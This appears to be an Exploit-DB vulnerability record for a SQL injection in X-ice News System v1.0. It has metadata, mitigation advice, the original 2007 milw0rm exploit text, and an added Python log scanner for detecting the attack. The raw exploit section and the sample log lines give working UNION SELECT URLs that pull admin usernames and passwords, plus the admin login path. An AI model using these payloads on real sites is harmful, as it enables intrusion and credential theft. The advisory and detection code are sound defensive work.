vendor: X-ice News System
by: CyberGhost
CVSS: 7.5 HIGH
Remote SQL Injection
CWE: 89
Product Name: X-ice News System
Affected Version From: X-ice News System v1.0
Affected Version To: X-ice News System v1.0
Patch Exists: NO
Related CWE:
CPE: a:x-ice:x-ice_news_system:1.0
Metasploit:
Other Scripts:
Platforms Tested:
2007

X-ice News System v1.0 Remote SQL Injection Vulnerability

The X-ice News System v1.0 is vulnerable to a remote SQL injection attack. An attacker can inject malicious SQL code into the username and password fields in the login page to retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user inputs and use parameterized queries or prepared statements to prevent SQL injection attacks. Additionally, keeping the software up to date and applying any patches or security updates provided by the vendor is advised.

Exploit-DB raw data:

#Title  : X-ice News System v1.0 Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://www.x-ice.org/haber%5Fv1/
#Download : http://aspindir.com/indir.asp?id=4601&sIslem=%DDndir

Vuln.

Username : /devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
Password : /devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

Login : /admin/kontrol.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - SaCReD SeeR - MaTRaX - by_emR3 - kerem125 - Bolivar - All TiTHaCK Members

And All TURKISH HACKERS !

# milw0rm.com [2007-03-13]
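
With no patch listed, one defensive check is to scan IIS W3C logs for requests to `devami.asp` whose `id` is not a plain integer, and to see whether the same client also requested `/admin/kontrol.asp`. This is an added example, not code from the advisory or the vendor; the log lines are constructed sample data, and treating `id` as a numeric article identifier is an assumption inferred from the URLs in the raw data.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C extended log excerpt (sample data, not from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-03-14 09:12:01 192.0.2.10 GET /devami.asp id=42 200
2007-03-14 09:12:07 192.0.2.10 GET /default.asp - 200
2007-03-14 09:13:44 198.51.100.7 GET /devami.asp id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin 200
2007-03-14 09:13:51 198.51.100.7 GET /devami.asp id=-1+UNION+SELECT+0,sifre,2,3,4,5,6,7+from+admin 200
2007-03-14 09:14:02 198.51.100.7 POST /admin/kontrol.asp - 302
2007-03-14 09:15:30 203.0.113.5 GET /devami.asp id=17&id=18 200
"""

def id_is_valid(query: str) -> bool:
    """Allowlist check (assumed rule): exactly one id value, 1-9 ASCII digits."""
    values = parse_qs(query, keep_blank_values=True).get("id", [])
    if len(values) != 1:
        return False  # missing id or duplicated parameter
    v = values[0]
    return v.isascii() and v.isdigit() and len(v) <= 9

def rows(log_text: str):
    """Yield one dict per request, using the column order from the #Fields directive."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def flag_requests(log_text: str, page: str = "/devami.asp"):
    """Return (client_ip, query) for each request to `page` whose id fails the allowlist."""
    return [(r.get("c-ip"), r.get("cs-uri-query", "")) for r in rows(log_text)
            if r.get("cs-uri-stem", "").lower() == page
            and not id_is_valid(r.get("cs-uri-query", ""))]

def suspects_reaching_admin(log_text: str, admin: str = "/admin/kontrol.asp"):
    """Clients that sent a rejected id and also requested the admin login page."""
    suspects = {ip for ip, _ in flag_requests(log_text)}
    return sorted({r.get("c-ip") for r in rows(log_text)
                   if r.get("cs-uri-stem", "").lower() == admin
                   and r.get("c-ip") in suspects})
```

The same allowlist rule can be enforced in front of the application (for example in a request filter) so that non-numeric `id` values never reach the query.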